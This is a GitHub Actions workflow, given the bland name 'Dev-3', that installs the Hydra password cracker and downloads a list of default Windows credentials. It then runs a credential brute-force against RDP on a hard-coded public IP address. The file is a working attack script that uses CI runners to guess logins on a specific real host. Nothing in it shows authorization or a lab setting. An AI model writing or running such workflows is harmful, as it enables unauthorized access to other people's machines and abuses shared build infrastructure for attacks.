name: Dev-3
on:
  workflow_dispatch:

jobs:
  Hydra:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2         
      - name: Install Dependencies
        run: |
         sudo apt-get install hydra-gtk
         wget --quiet https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/windows-betterdefaultpasslist.txt -O default.txt
      - name: Hydra
        run: |
         hydra -V -f -C default.txt rdp://96.65.26.181
